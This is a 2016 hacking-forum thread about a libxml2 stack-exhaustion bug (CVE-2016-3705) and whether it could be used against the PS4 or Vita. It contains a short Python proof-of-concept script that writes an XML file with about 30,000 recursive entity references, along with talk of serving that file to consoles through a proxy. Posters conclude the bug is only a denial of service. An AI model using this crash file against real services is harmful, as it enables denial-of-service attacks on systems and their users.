Page 1 of 1

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Posted: Wed May 04, 2016 6:05 am
by dragood2
Hi
This is a disclosure of the following issue that was raised a week ago
on the distro's mailing list. Both bugs on the gnome bugtracker are
currently private and should be made public now.
A couple of weeks back while working on a related bug [CVE-2016-3627] I
discovered a specially created xml file is capable of triggering a stack
overflow before libxml2 can detect its a invalid xml file.

We raised this issue upstream on 2016-04-18 and informed them that we
would place a two week embargo on the issue in case we didn't here back.
As of yet we have had no response so we have posted here.
https://bugzilla.gnome.org/show_bug.cgi?id=765207

We intend to keep the current embargo (ending May 3) unless we get
advise otherwise here. Below is a script to generate the xml file.

The functions xmlParserEntityCheck() and xmlParseAttValueComplex() used
to call xmlStringDecodeEntities() in a recursive context without incrementing the 'depth' counter in the parser context. Because of that omission, the parser
failed to detect attribute recursions in certain documents before running out
of stack space.

Hope this helps guide those that have the skill to take it further.

Re: Libxml2 exploit poc, possible ps4 port?

Posted: Wed May 04, 2016 6:06 am
by dragood2
Script:
#!/bin/python3

f = open('repo.xml', 'w')

f.write( "<!DOCTYPE a [ ")

i = 1

while (i < 30000):
f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
i = i+1

f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

f.close()

Re: Libxml2 exploit poc, possible ps4 port?

Posted: Wed May 04, 2016 9:56 pm
by wololo
Thanks.
It would be interesting to understand where the PS4 uses libxml2. I seem to recall lots of the data coming from the servers to display online information might be in xml format, wondering if it's encrypted though (in which case a proxy to serve the file for tests might not be enough). How about the browser?

Appreciate if people chime in on this one. There's a file to repro on the bugzilla link, for those too lazy to run the script from dragood2 :)

Re: Libxml2 exploit poc, possible ps4 port?

Posted: Thu May 05, 2016 12:02 am
by lazydog2055
looks like there was also an xml exploit in ios and osx. http://www.cvedetails.com/cve/CVE-2016-1762/

I remember with the beta firmwares sony would push a special xml to the consoles telling them to download the fw based off of some info (likely console id). With updates they also use an xml referred from a link that a proxy would be able to see. If we instead point it to the xml in question ??? Might give this a try if I can set Charles up properly. It seems too simple and wouldn't surprise me if the Web browser comes to be key.

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 4:26 pm
by wololo
Please make sure to always mention your sources when copy/pasting other people's stuff!
The source for reference: http://seclists.org/oss-sec/2016/q2/191

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 8:30 pm
by xyz
it's useless

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 8:43 pm
by wololo
Can you detail why? Stack Protector, but besides that?

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 8:48 pm
by xyz
It's stack exhaustion due to high recursion depth. As you can see https://access.redhat.com/security/cve/cve-2016-3705 https://access.redhat.com/security/cve/cve-2016-3627 both bugs only have availability impact, i.e. it's a DoS.

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Fri May 06, 2016 8:51 pm
by wololo
Thanks

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Posted: Sun May 15, 2016 9:11 pm
by Zecoxao
Image